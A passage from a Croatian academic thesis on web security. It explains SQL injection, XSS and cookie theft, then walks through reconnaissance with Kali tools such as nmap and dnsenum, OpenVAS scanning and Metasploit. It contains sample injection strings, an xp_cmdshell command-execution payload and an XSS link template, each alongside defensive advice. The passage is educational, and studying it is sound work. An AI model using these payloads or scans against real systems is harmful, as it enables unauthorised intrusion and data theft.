ako, Z. i dr. (2011). Slabosti web aplikacija: Pregled modernih metoda kompromitiranja i zatite
sigurnosti weba. Projektna dokumentacija. Sveuilite u Zagrebu, Fakultet organizacije i informatike
Varadin. https://www.google.hr/url?q=http://slabosti-web-aplikacija.googlecode.com/files/Slabosti
%2520web
%2520aplikacija.pdf&sa=U&ei=eaJCU5eCLqv_ygOp_4CICA&ved=0CBkQFjAA&usg=AFQjCNGEsn5Bea
RYZ2i0koY5zmvv_dJGGg (preuzeto 07.04.2014.)., str. 18 .

88

Prva pogreka koju obino susreemo je sintaksna pogreka (eng. sintax error). Sintaksna
pogreka oznaava da upit ne odgovara strukturi ispravnog SQL upita. Prva stvar koju moramo
utvrditi je, da li je mogua injekcija bez izbjegavanja navodnika, ako jest radi se o direktnoj
injekciji (Zelanto, 2008).
U sluaju direktne injekcije, koji god argument predamo koristit e se u SQL upitu bez
bilo kakve izmjene. Direktne vrijednosti mogu biti numerike vrijednosti koje se koriste u
WHERE dijelu upita ili argumenti SQL naredbe poput naziva tablice ili atributa tablice u bazi
podataka. U svim ostalim sluajevima u injection string-u nuno je koristiti navodnike (Zelanto,
2008).
SELECT naredbom vrimo dohvat informacija iz baze podataka, a ukoliko izmijenimo
where dio SQL upita tako da mu dodamo naredbu UNION SELECT koja e omoguiti da
rezultat bude unija novog SQL upita, posluitelj e isporuiti i one informacije iji dohvat nije
bio namjeravan.
Pretpostavimo da je zadana skripta sa sljedeim programskim kdom159:
SQLString = "SELECT Ime, Prezime FROM Zaposlenici
WHERE Grad = " & strCity & ""
Ako koristimo injection string oblika:
UNION ALL SELECT DrugiAtribut FROM DrugaTablica WHERE =
Posluitelju baze podataka e biti poslan ovaj SQL upit:
SELECT Ime, Prezime FROM Zaposlenici
WHERE Grad =
UNION ALL
SELECT DrugiAtribut FROM DrugaTablica
WHERE =
Mehanizam baze podataka e pregledati tablicu Zaposlenici traei red gdje je atribut
Grad postavljen na ''nita''. Budui da ga nee pronai, nee vratiti nikakve informacije. Jedine
informacije koje e upit vratiti bit e iz drugog, injektiranog SQL upita. U ovom primjeru smo
159

Zelanto, M., op. cit., 7. 1 2. Koritenje SELECT naredbe.

89

pretpostavili da ne postoji zaposlenik koji nema vrijednost atributa Grad. U nekim sluajevima
''nita'' nee funkcionirati jer postoje zapisi u bazi koji koriste ''nita'' u odgovarajuem atributu.
U tom sluaju potrebno je samo upisati vrijednost koja se ne pojavljuje u tablici (Zelanto, 2008).
Neki posluitelji baze podataka vraaju dio upita koji sadri sintaksnu pogreku. Ovisno
o strukturi upita, pojedini injektirani niz e dobaviti korisne informacije, dok drugi nee.
Mogue je manipulirati injektirani upit tako da polako, ali konano sigurno, vrati eljenu
informaciju. To se postie dodavanjem dodatnih uvjeta u WHERE dio upita koji e sprijeiti
odabir odreenih redova tablice. Pretpostavimo da je poetni injection string izgledao ovako160:
UNION ALL SELECT PrviAtribut, DrugiAtribut, TreciAtribut
FROM Tablica
WHERE =
Neka je rezultat ovog upita 'prvi', 'drugi' i 'treci'. Sljedei injection string bi izgledao ovako:
UNION ALL SELECT PrviAtribut, DrugiAtribut, TreciAtribut
FROM Tablica
WHERE PrviAtribut NOT IN (prvi)
AND DrugiAtribut NOT IN (drugi)
AND TreciAtribut NOT IN (treci)
AND =
Dio NOT IN() osigurava da povratna informacija budu podaci koje jo ne znamo (u ovom
sluaju drugi red tablice Tablica).
5.4.3 Koritenje INSERT naredbe
Naredba INSERT se koristi za dodavanje n-torki u bazu podataka. U Web aplikacijama
se obino koristi za registraciju korisnika, dodavanje proizvoda u ''kolica'' pri online-kupovini i
sl. Provjeravanje ranjivosti sa INSERT naredbom je slino onom sa WHERE. Koritenje ove
naredbe nije preporuljivo ukoliko se eli izbjei detekcija napada (Zelanto, 2008).
Pretpostavimo da web stranica sadri neku vrstu obrasca za registraciju, u kojoj je
potrebno upisati ime, adresu, broj telefona itd. Nakon predaje obrasca, preusmjerujemo se na
160

loc. cit.

90

stranicu koja prikazuje predane podatke uz opciju izmjene tih podataka ili neto slino. Ovo je
vrlo vano, jer da bi mogli iskoristiti INSERT ranjivost moramo moi vidjeti predane podatke.
Nije vano u kojem obliku161.
Naredba INSERT ima ovakvu strukturu:
INSERT INTO Tablica VALUES (jedan, dva, tri)
Ukoliko se eli manipulirati podacima koji su predani kao argumenti u VALUES dijelu
naredbe, kako bi se dohvatili neki drugi podaci, potrebno je koristiti podupite. Pogledajmo
sljedei primjer:
SQLString = "INSERT INTO ImeTablice VALUES (" & strJedan & ", " & strDva & ", " &
strTri & ")"
Ako ispunimo obrazac na sljedei nain:
Name:+(SELECT TOP 1 ImeAtributa FROM ImeTablice)+
Email: bla@bla.com
Broj_telefona: 333-333-3333
Dobit emo naredbu:
INSERT INTO ImeTablice VALUES ( + (SELECT TOP 1 ImeAtributa FROM ImeTablice) +
, bla@bla.com, 333-333-3333)
Na stranici gdje moemo vidjeti predane podatke, umjesto imena pisat e vrijednost
atributa strJedan. Da nismo koristili TOP 1 u injection string-u, dobili bi poruku da je dolo do
pogreke jer je podupit vratio previe redova. Da bi dohvatili ostale redove koristimo NOT IN()
(Zelanto, 2008).
5.4.4 Koritenje SQL Server pohranjenih procedura
Microsoft SQL Server instalacija ima vie od 1000 pohranjenih procedura. Ukoliko
napada pokuava upotrijebiti napad SQL injekcijom na Web aplikaciju koja koristi SQL Server,
pohranjene procedure mogu se pokazati izvaredno korisnima. Ovisno o dozvolama pristupa
161

Zelanto, M., op. cit., 7. 1. 3. Koritenje INSERT naredbe.

91

korisnika u bazi podataka koje koristi web aplikacija, neke, sve ili ak niti jedna od tih pocedura
se moe koristi (Zelanto, 2008).
Injekcija pomou pohranjenih procedura izgleda otprilike ovako (prema Zelanto, 2008):
simplequoted.asp?city=seattle;
EXEC master.dbo.xp_cmdshell cmd.exe dir c:
Na poetku je dan valjan argument, nakon njega slijedi jednostruki navodnik i ;.
Poslijednji argument pohranjene procedure nema zavrni navodnik. Ovakav ulaz e zadovoljiti
potrebe sintakse. Postoji mogunost da e u ulazu biti potrebne zagrade ili dodatni WHERE
uvjeti i sl. ali nije potrebno se brinuti o usklaenosti atributa ili tipova podataka (Zelanto, 2008).
master.dbo.xp_cmdshell je jedna od najznaajnijih pohranjenih procedura. Uzima samo
jedan argument koji je naredba koju elimo izvriti na korisnikoj razini SQL Servera (Zelanto,
2008).
xp_cmdshell {command_string} [, no_output]
Korisnik web aplikacije, meutim, gotovo nikad nee imati dozvolu za izvoenje ove
pohranjene procedure (Zelanto, 2008).
Jo jedna vrlo korisna procedura je master.dbo.sp_makewebtask (prema Zelanto, 2008):
sp_makewebtask[@outputfile=]outputfile,[@query=] query
Argumenti ove procedure su izlazna datoteka i SQL upit. sp_makewebtask uzima zadani
upit i kao rezultat daje web stranicu koja sadri rezultat upita (Zelanto, 2008).
Ne postoji neki siguran nain koji bi sprijeio SQL injekciju, ali postoje naini da se
smanji vjerojatnost njenog dogaanja. U nastavku su dani neki od tih naina (prema Zelanto,
2008):
Provjeravati ulaz: Vrlo je vano provjeravati ulazne podatke koje je predao korisnik
kako bi se osiguralo da ne sadre opasne kdove, bez obzira radi li se o SQL-u ili HTML-u.
Umjesto brisanja ''loih dijelova'', jer je vjerojatnost da emo se sjetiti svega to moe ugroziti
sigurnost vrlo malena, preporua se brisanje svega osim ''dobrih dijelova''.

92

Zabraniti navodnike i escape znakove u ulazu: No usprkos injenici da lako moemo


provjeriti email ili telefonski broj, nije preporuljivo izbaciti navodnike iz polja imena zbog
postojanja prezimena poput O'Reilly. Postoje alati koji vre provjeru da su navodnici ''dobro
napisani'' i koji poveavaju sigurnost, ali ne sprjeavaju u potpunosti napad.
Koristiti ograniene parametre: U sluaju ove metode zatite SQL upiti sadre prazna
mjesta koja su oznaena upitnikom i upit se prevodi u interni obrazac.
Ograniiti pristup bazi podataka i odvojiti korisnike: Potrebno je, to je mogue vie,
ograniiti prava web aplikacije na pristup bazi podataka: dozvoliti pristup samo tablici korisnika
i to iskljuivo kroz SELECT naredbu.
Koristiti pohranjene procedure za pristup bazi podataka: Ako ih posluitelj
podrava, preporua se da aplikacija koristi SQL pohranjene procedure za pristup bazi, jer je na
taj nain mogue sprijeiti napad (pod pretpostavkom da su pohranjene procedure dobro
napisane).
Izolirati

web posluitelja:

Potrebno

je

projektirati

infrastrukturu

mree

sa

pretpostavkom da e napada na neki nain uspjeti dobiti sve dozvole pristupa posluitelju, te je
potrebno ograniiti naine da se to iskoristi da bi se iskompromitiralo neto drugo.
Podesiti prijavljivanje pogreaka: Standardne postavke prijave pogreaka u nekim
radnim okruenjima ukljuuju informacije o traenju pogreaka u programu (eng. debugging).
5.5 Cross site scripting
Danas su Web stranice kompleksnije nego ikad jer sadre mnogo dinamikih sadraja. Ti
dinamiki sadraji se ostvaruju pomou Web aplikacija koje u ovisnosti o njihovim postavkama i
potrebama isporuuju korisniku razliite izlaze. Za razliku od statikih, dinamike web stranice
pate od opasnosti koja se naziva cross site scripting. Neko se za ranjivosti ove vrste koristila
kratica CSS, ali zbog este zabune sa Cascading Style Sheets i Content-scrambling system danas
se koristi kratica XSS (Zelanto, 2008).
Cross site scripting je mogu kod dinamiki generiranih web stranica kada iste pokazuju
ulaz bez provjere valjanosti istog. Napada tada u tako generiranu stranicu moe ugraditi
zlonamjerni JavaScript kd koji e se izvriti na raunalu korisnika koji posjete tu stranicu.
Uspjenim izvrenjem skripte, moe se doi do povjerljivih informacija, mijenjati ili preuzeti

93

cookies, predstavljati se kao neki drugi korisnik, izvravati zlonamjerni kd na krajnjim


korisnikim raunalima itd162. Opisat e se neki od poznatijih naina napada ove vrste.
5.5.1 Ispisivanje skupa naredbi putem zlonamjernog linka
U sluaju ispisivanja naredbi putem zlonamjernog link-a, napada e poslati rtvi napada
posebno stvorenu email poruku koja sadri zlonamjernu skriptu unutar linka (Zelanto, 2008.). Na
primjer:
<A HREF =
http://neka_stranica.com/registracija.cgi?profil_klijenta=
<SCRIPT>zlonamjerni kod</SCRIPT>>
Click here
</A>
Ako korisnik, ne sumnjajui nita, klikne na ovaj link, poslat e posluitelju zahtjev za
stranicom neka_stranica.com zajedno sa zlonamjernom skriptom. Kada posluitelj poalje
stranicu natrag korisniku poslat e mu i vrijednost parametra profil_klijenta, te e se u
korisnikovom pregledniku izvesi zlonamjerna skripta (Zelanto, 2008).
Slika 23: Napad putem zlonamjernog link-a

Izvor: http://os2.zemris.fer.hr/ns/malware/2007_zelanto/xss.html

162

http://en.wikipedia.org/wiki/Cross-site_scripting. (preuzeto 17.03.2014.).

94

5.5.2 Slanje nedozvoljenog zahtjeva

U ovom sluaju korisnik takoer neznajui izvodi zlonamjernu skriptu na svom raunalu,
nakon to je slijedio posebno stvoren link. Zbog toga to se skripta izvodi tako da se ini da je
potekla od legitimnog posluitelja, napada ima potpuni pristup dokumentu koji je vraen i moe
poslati podatke koji su sadrani u stranici na neku svoju stranicu. Ako ugraena skripta ima
dodatne interakcijske sposobnosti sa legitimnim posluiteljem bez da upozorava rtvu napada,
napada moe eksploatirati primljene podatke o rtvi na nekoj drugoj stranici legitimnog
posluitelja (Zelanto, 2008).
Praktini primjer nedozvoljenog zahtjeva putem HTML-a je XMLHttpRequest objekta,
koji su dio AJAX programa. AJAX je skupina tehnologija koja omoguuje slanje i obradu
HTML zahtjeva, a koja ima dosta prednosti u odnosu na druge tehnologije.
Jedna od njih je mogunost da korisnici ne moraju stalno uitavati stranice kada neki
element ele uitavati. HTTP zahtjev se alje i to se odvija predavanjem web formulara ili
otvaranjem web poveznice. XMLHttpRequest objekti se koriste kako bi se HTTP zahtjevi
generirali automatski u web pregledniku. Taj postupak se dogaa u pozadini, tako da korisnik
nije toga svjestan i to mu olakava rad. Primjer uporabe ove funkcije u Internet Exploreru dan je
u programskom kodu koji slijedi (prema ako i dr., 2011:26):
<script>
xmlhttp=new XMLHttpRequest() ;
xmlhttp.open(GET, http://urlAdresa,true);
xmlhttp.onreadystatechange = ispisiOdgovor();
xmlhttp.send(null);
function ispisiOdgovor(xmlhttp,element_id)
{ var element = document.getElementById(element_id);
if (xmlhttp.readyState == 4)
{ var tekst = http.responseText;
dokument.write.tekst; }
}
</script>

95

Ovaj kod prikazuje jednu od estih funkcija. To je funkcija open i slanje odgovora
koji se postie funkcijom send. Glavna funckija je ispisOdgovor i onda se poziva kod svake
promjene prikazanog svojstva (prema ako i dr., 2011:26).
Slika 24: Slanje nedozvoljenog zahtjeva

Izvor: http://os2.zemris.fer.hr/ns/malware/2007_zelanto/xss.html
5.5.3. Kraa korisnikih kolaia (eng. cookies)

Ako bilo koji dio web stranice koristi cookies, tada postoji mogunost da ih se moe
ukrasti od korisnika. U ovom sluaju, pri pregledavanju stranice izvri se zlonamjerna skripta
koju je stvorio napada i ''pokupi'' korisnike cookies i poalje zahtjev za napadaevom web
stranicom sa skupljenim cookies. Koristei ovu tehniku napada moe dobiti osjetljive podatke
poput lozinki, broja kreditnih kartica, ili proizvoljnu informacije koje unosi korisnik (Zelanto,
2008).
Slika 25: Kraa korisnikih kolaia (eng. cookies)

96

Izvor: http://os2.zemris.fer.hr/ns/malware/2007_zelanto/xss.html
Cross site scripting se postie kada napada preko legitimnog Web posluitelja poalje
web pregledniku rtve napada stranicu koja sadri zlonamjernu skriptu. Ta skripta e se izvesti
koristei sve dozvole kao legitimna skripta sa legitimnog posluitelja. Razvojni programeri
mogu zatititi svoje web stranice tako da osiguraju da dinamiki generirana stranica ne sadri
neeljene oznake (eng. tag) (Zelanto, 2008.).
Da bi se umanjio rizik od XSS napada moe se onemoguiti izvoenje skriptnih jezika u
web pregledniku i na taj nain ostvariti potpunu zatitu, ali uz bitno smanjenu funkcionalnost.
Drugi nain zatite uz zadravanje funkcionalnosti je pripaziti na linkove kojima se pristupa, u
smislu da se odabire iskljuivo one ija putanja zapoinje sa poetne web stranice.
Kod dizajniranja web stranica potrebno je mnogo truda da bi se iste uinile otpornima na
XSS napade i takoer valja imati na umu da niti jedno rjeenje nije potpuno ni konano ve
podlono estim periodikim prepravkama i nadopunama.

Popularne metode zatite od ovog napada su:


-

Kodiranje: mora se propisno izvesti, tj. koritenjem ISO-8859-1 specifikacije u obliku


numerikih vrijednosti. Tako npr. < i > se mogu napisati kao &lt i &gt, razmak se moe
napisati kao %20, znakovi ( i ) kao &#40 i &#41 itd. Openito govorei, kodiranje se
preporua zato to nije potrebno odluiti koji znakovi e se zabraniti, a koji dozvoliti.
Naalost, kodiranje svih nepouzdanih podataka moe zauzeti veliku koliinu resursa i
usporiti perfomanse nekih web posluitelja (prema Zelanto, 2008).

97

Filtriranje: Osnova ovog pristupa je da ne treba nikad vjerovati korisnikom ulazu i da


je potrebno uvjek filtrirati posebne znakove (eng. metacharacters) koji su definirani u
HTML specifikaciji. Svako ulazno polje, ukljuujui parametre linka, mora biti
provjereno da ne sadre oznake skripti (eng. script tags). Ako se pronau nedozvoljeni
znakovi, ulaz se odbacuje i na taj nain se sprijeava prezentiranje zlonamjernog HTMLa u korisnikovom web pregledniku. Sloenosti pridonosti i injenica da mnogi Web
posluitelji pokuavaju ispraviti uobiajene pogreke u HTML-u. Kao rezultat toga, oni
ponekad tretiraju odreene znakove kao da su posebni, iako po specifikaciji, oni to nisu.
Stoga je vano uoiti da pojedine situacije mogu traiti ukljuivanje dodatnih znakova u
listu specijalnih znakova. Filtriranje ulaza nije toliko uinkovito zato to se dinamiki
sadraj moe ubaciti u bazu podataka Web stranice raznim metodama, a ne samo
koristei HTTP. U tom sluaju, Web posluitelj nee vidjeti podatke kao dio ulaza pa e
oni ostati iskvareni. Preporuuje se obaviti filtriranje izlaza prije nego se preda
dinamikoj stranici (Zelanto, 2008).

5.6 Izvoenje napada na sustavima raunalne komunikacije

U ovom potpoglavlju prikazat e se izvoenje nekih trenutno najaktualnijih napada, sa tzv.


ethical hacking163 perspektive, koja je esto predmet zlouporaba i slui samo kao izgovor za
izvoenje zlonamjernih napada. Da bi se neki napad mogao smatrati etikim, napada mora
potivati slijedea pravila:
1. Pravo izvoenja napada na raunalni sustav trebalo bi biti dodijeljeno u pisanoj formi od
strane njegovog vlasnika;
163

Termin koji opisuje ciljano napadanje raunalnih sustava radi individualnog ili korporacijskog
uoavanja eventualnih ranjivosti sa ciljem njihovog otklanjanja
http://www.computerhope.com/jargon/e/ethihack.htm. (preuzeto 16.03.2014.).

98

2. Prilikom izvoenja napada, u cijelosti je nuno potivati tajnost korporativnih podataka i


usredotoiti se iskljuivo na potencijalne ranjivosti sustava;
3. Sve uoene ranjivosti i nepravilnosti bez iznimke se prijavljuju vlasniku sustava ne
preuujui pritom pojedine od onih koje bi se kasnije eventualno mogle zlouporabiti;
4. Vlasnike pojedinih softvera takoer je potrebno obavijestiti o svakoj uoenoj ranjivosti ili
nepravilnosti koja proizlazi iz samog softvera.
Zainteresirani pojedinci mogu pristupiti ispitu za certificirane Ethical Hacker e. Ispitivanje
provodi International Council of E Commerce Consultants (EC - Council) 164, uz trokove od
oko 500 $ za provoenje ispita koji se sastoji od 125 pitanja iz podruja raunalne sigurnosti.
Postupak izvoenja napada podijelit emo na:
-

prikupljanje podataka o sustavu (evaluacija) (eng. information gathering);

procjenu ranjivosti (eng. vulnerability assessment);

iskoritavanje ranjivosti (eng. exploiting vulnerabilities);

poveavanje prava radi naknadnog pristupa (eng. escalating privileges) (prema Pritchet i
Smet, 2013).
Metodologija izvoenja ovdje prezentiranih napada prikazana je koritenjem KALI

distribucije operativnog sustava Linux.


5.6.1 Prikupljanje podataka o sustavu

Jedna od najvanijih faza izvoenja napada je prikupljanje informacija (eng. information


gathering). Da bismo bili u mogunosti pokrenuti napad, moramo se to bolje informirati o meti.
to vie informacija pribavimo, vea je vjerojatnost uspjenog napada. Postoje alati koji nam
pomau u prikupljanju i organiziranju informacija o meti; dobri su primjeri Maltego CaseFile 165 i
KeepNote. Ovdje emo prikazati osnove prikupljanja informacija uporabom Maltego CaseFile
softvera, na primjeru mapiranja mree (prema Pritchet i Smet, 2013:67).

164

http://www.eccouncil.org/. (preuzeto 06.03.2014.).

165

PATERVA Ltd., https://www.paterva.com/web6/. (preuzeto 06.03.2014.).

99

Potrebno je prije svega izabrati metu - domenu (web ili intranet adresu) za koju elimo
pokrenuti prikupljanje informacija. Poinjemo sa Set the domain name target opcijom klikom
na kreirani Domain entity i ureivanjem Domain Name polja u Property View izborniku.
Slika 26: Maltego CaseFile suelje sa odabranom metom

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Odabirom mete, spremni smo za prikupljanje podataka. Desnim klikom na metu,
odabiremo Run Transform opciju za prikaz raspoloivih podataka koje je mogue prikupljati.

Slika 27: Maltego CaseFile suelje sa opcijama prikupljanja informacija

100

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Sada smo slobodni odabrati pojedine opcije, ili jednostavno All transforms da dobijemo
sve raspoloive informacije o meti.
Slika 28: Maltego CaseFile suelje sa prikupljenim informacijama

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Softver nudi i mogunosto enkripcije dobivenog grafikona AES-128 algoritmom, radi
konspirativnosti.

101

Osim sloenih programskih alata poput gore opisanih, postoje i pojedinani, namjenski
programi koji zasebno obrauju pojedine segmente prikupljanja informacija; slijede u nastavku.
5.6.1.1 Popisivanje usluga (enumeracija)

Popisivanje usluga ili enumeracija (eng. service enumeration) je proces koji nam
omoguava prikupljanje informacija o uslugama (servisima) koje mreno okruenje podrava.
Ovdje emo prikazati osnove enumeracije DNS i SNMP servera. Enumeracijom DNS server
moemo dobiti kljune podatke o korisnikim imenima, nazivima raunala, IP adresama u
mrenom okruenju. Koristit emo DNSenum alat otvorenog koda (eng. Open source software OSS166), dok emo za enumeraciju korisnika SNMP mrenog prometa koristiti SnmpEnum OSS
alat (prema Pritchet i Smet, 2013:68).
DNS enumeraciju provodimo iz terminalnog suelja (Linux), naredbom
./dnsenum --enum (domena mete)
Izvrenom naredbom dobivamo podatke o name serverima, mail serverima, i ako je
mogue i DNS zone trasfer167.

Slika 29: Enumeracija DNSenum alatom

166

Softver ija licenca korisniku dozvoljava slobodnu distribuciju bilo kome pod bilo kojim uvjetima. Takvi
softveri mogu se mijenjati u izvornom kodu, koristiti i distribuirati bez ogranienja,
http://en.wikipedia.org/wiki/Open-source_software. (preuzeto 17.03.2014.).
167

DNS transakcija koja omoguava replikaciju DNS baze podataka,


http://en.wikipedia.org/wiki/DNS_zone_transfer. (preuzeto 06.03.2014. ).

102

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai

5.6.1.2 Odreivanje raspona IP mrenih adresa (bloka)


Uz pomo podataka prikupljenih enumeracijom, moemo pristupiti utvrivanju mrenog
raspona ili IP bloka na komunikacijskom sustavu koji planiramo napasti. To moemo obaviti
naredbom dmitry (Deepmagic

Information

Gathering

Tool 168) standardno ugraenom u

terminalno suelje UNIX (GNU)169/Linux bazirane operativne sustave (prema Pritchet i Smet,
2013:71).
dmitry -wnspb (meta) -o /root/Desktop/dmitry-result
Po izvrenju naredbe, rezultati e biti dostupni u datoteci dmitry-result.txt, generiranoj na
radnoj povrini (Desktop).
Slika 30 : Rezultati prikupljeni sintaksom naredbe dmitry

168

http://manpages.ubuntu.com/manpages/raring/man1/dmitry.1.html. (preuzeto 06.03.2014.).

169

GNU je Unixu slian raunalni operacijski sustav koji se potpuno sastoji od slobodnog softvera i ne
sadri Unixov kd, http://hr.wikipedia.org/wiki/GNU. (preuzeto 06.03.2014.).

103

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
5.6.1.3 Identifikacija aktivnih raunala

Napad emo uvijek usmjeriti na aktivna raunala odnosno ona koja su podignuta,
ukljuena i sa uitanim operativnim sustavom te uspostavljenom mrenom povezanou.
Najjednostavnije bi njihov aktivni status bilo provjeriti naredbom ping., no sustav moe odbaciti
ili zabiljeiti njeno koritenje, a prilikom izvoenja napada ne elimo ostaviti nikakve tragove
(prema Pritchet i Smet, 2013:73).
Jedno od elegantnih rjeenja je koritenje softvera Nmap170, odnosno njegove sintakse
nping --echo-client "public" echo.(meta)

Slika 31: Rezultati identifikacije prikupljeni sintaksom naredbe nping softvera Nmap

170

Odlian freeware port scanner za istraivanje mrene sigurnosti/ranjivosti, http://nmap.org/. (preuzeto


06.03.2014.).

104

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
5.6.1.4 Pronalaenje otvorenih portova

Pronalaenje otvorenih portova na je slijedei korak po prikupljanju saznanja o rasponu


mrenih adresa i aktivnim raunalima. Posebno nas zanimaju TCP i UDP portovi i pristupne
toke (eng. access points). Za pronalaenje otvorenih portova takoer emo koristiti softver
Nmap, ije su sintakse nebrojene a ovdje donosimo samo osnovnu koju takoer izvravamo iz
terminalnog suelja:
nmap (meta)
Slika 32: Podaci o portovima prikupljeni sintaksom naredbe nping softvera Nmap

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai

105

Za uspjeno identificiranje portova mora se u ovom sluaju pokrenuti Apache web server
na source (napada) raunalu.
6.6.1.5 Identifikacija operativnog sustava i servisa (eng. fingerprinting)

Do sada smo ve prikupili i dokumentirali podatke o IP adresama, aktivnim raunalima i


otvorenim portovima nae mete napada. Slijedei korak je utvrivanje operativnih sustava na
aktivnim raunalima, kao i prisutnih servisa.Koristit emo takoer ve poznati softver Nmap i
freeware171 pomoni program (eng. utility) p0f172 (Passive OS Fingerprinting utility). Najprije
izvravamo sintaksu Nmap softvera sa O opcijom koja omoguava detekciju operativnog
sustava (prema Pritchet i Smet, 2013:77):
nmap -O (meta)
Slika 33: Podaci o operativnom sustavu prikupljeni uporabom softvera Nmap

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
171

Raunalni softver dostupan za besplatnu uporabu, http://hr.wikipedia.org/wiki/Freeware. (preuzeto


06.03.2014.).
172

Autorska prava polae Michal Zalewski (2012), http://lcamtuf.coredump.cx/p0f3/. (preuzeto


06.03.2014.).

106

Za utvrivanje servisa, koristit emo opciju sV


nmap sV (meta)
te dobivamo slijedei ispis u naem primjeru173:

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28


05:10 CDT
Interesting ports on 192.168.10.200:
Not shown: 1665 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd 5.0
25/tcp open smtp Microsoft ESMTP 5.0.2195.6713
80/tcp open http Microsoft IIS webserver 5.0
119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702
(posting ok)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1755/tcp open wms?
3372/tcp open msdtc?
6666/tcp open nsunicast Microsoft Windows Media Unicast
Service (nsum.exe)
Information Gathering
80
MAC Address: 00:50:56:C6:00:01 (VMware)
173

Pritchett, W.L., Smet, D.D. (2013). Kali Linux Cookbook. Birmingham Mumbai: Packt Publishing, str.
79.

107

Service Info: Host: DC; OS: Windows


Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds.

Uporabom obje sintakse poveavamo tonost prilikom utvrivanja konkretnog


operativnog sustava.
5.6.2 Procjena ranjivosti sustava

Procjena ranjivosti sustava (eng. vulnerability assessment), odnosno skeniranje i


identificiranje ranjivosti sustava jedna je od najmukotrpnijih zadaa a ujedno i najvanija. Samo
dobro obavljena procjena omoguava nam pripremu najoptimalnijeg seta napada i postizanje
ciljeva, u naem sluaju utvrivanja i otklanjanja eventualnih sigurnosnih propusta (prema
Pritchet i Smet, 2013:93).
U ovom sluaju procjenu ranjivosti prikazat emo koritenjem OpenVAS 174 (Open
Vulnerability Assessment System) softvera. Ranjivosti koje se mogu uoiti njegovom uporabom
moemo podijeliti na:
-

ranjivosti Linux operativnog sustava;

ranjivosti Windows operativnog sustava

provjere lokalne sigurnosti;

ranjivosti mrenih servisa.

U ovom sluaju e nas posebno zanimati ranjivosti mrenih servisa. Pritom valja napomenuti
da navedene ranjivosti mrenih servisa svakako moramo promatrati ovisno o operativnom
sustavu raunala koje je cilj napada.
Softver OpenVAS funkcionira kroz Mozilla Firefox web preglednik, pa se najprije potrebno
putem njega i logirati na lokalnoj adresi http://127.0.0.1:9392. Izabiremo opcije Configuration i
Scan Configs.

Slika 34: OpenVAS konfiguracijsko suelje


174

Odlian OSS za sloena istraivanja ranjivosti sustava i njihova otklanjanja, www.openvas.org,


(preuzeto 06.03.2014.).

108

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Sada je potrebno konfigurirati OpenVas za pretragu seta njemu poznatih mrenih ranjivosti,
to zbog poveeg opsega neemo posebno prikazati, ve se fokusirati na nie navedeno suelje
koje prikazuje izvrenu pretragu.

Slika 35: OpenVAS suelje izvrene pretrage mrenih ranjivosti

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Sa predmetne slike vidljivo je da su ne testnom primjeru uoene samo niske razine
prijetnji (njih 14) na ciljanoj lokalnoj mrei.

109

5.6.3 Iskoritavanje ranjivosti sustava

Iskoritavanje ranjivosti sustava (eng. exploiting vulnerabilities) razlog je svim prethodno


poduzetim radnjama. Kada jednom prikupimo sve potrebne podatke, moemo kreirati adekvatan
set napada u odnosu na utvrene kritine toke.
Utvrivanje ranjivosti sustava neiscrpno je podruje u kojem sudjeluje velik broj
pojedinaca i interesnih skupina na globalnoj razini. Manje uspjeni nastoje kopirati metode
iskoritavanja ranjivosti utvrene od strane onih uspjenijih, dok ovi potonji neprekidno
otkrivaju nove kritine toke i rade na njihovim iskoritavanjima ili otklanjanju, ve prema
vlastitim afinitetima.
Na taj nain stvaraju se istraivake zajednice globalnih razmjera, dovoljno mone da
kreiraju iznimno optimizirane i mone alate za automatsko uoavanje i iskoritavanje ranjivosti
sustava. Takvi su alati pojednostavljeni do maksimalnih moguih razmjera, ali jo uvijek
dovoljno sloeni da se ne bi mogli do kraja obraditi u sastavu ovog rada. Jedan od takvih, moda
ujedno i najpoznatiji, alata je Metasploit175, moan set alate za testiranje prodora u sustave (eng.
penetration testing). Pomou Metasploita mogue je izvriti sve vrste napada spomenutih od
poetka ovog rada , i jo mnoge druge.
Najpoznatiji potprojekt Metasploita je Metasploit Framework, OSS alat za razvoj i
koritenje koda za iskoritavanje (eng. exploit code) na udaljenoj meti. Armitage je grafiko
suelje za vizualizaciju mete, sa preporukama za iskoritavanje. Svakako najnaprednija a ujedno
i najskuplja inaica je Cobalt Strike, razvijen na Metasploit platformi od tvrtke Strategic Cyber
LLC, Washington.
Openito je prednost Metasploit distribucija u koritenju tzv. payload-ova (eng. payload
koristan teret) koji se neposredno prije distribucije na metu kompajliraju ovisno o prikupljenim
podacima o ranjivosti. Metasploit nudi pregrt takvih, koje ugrubo moemo podijeliti na:

Command shell omoguavaju napadau izvoenje skripti ili provedbu proizvoljnih


naredbi prema meti;

Meterpreter omoguavaju korisniku nadzor ekrana pomou VNC softvera te upload i


download datoteka.

Slika 36: Izgled Armitage grafikog suelja za Metasploit


175

Moan penetracijski softver razvijen u suradnji Open Source zajednice i tvrtke Rapid7, autorska prava
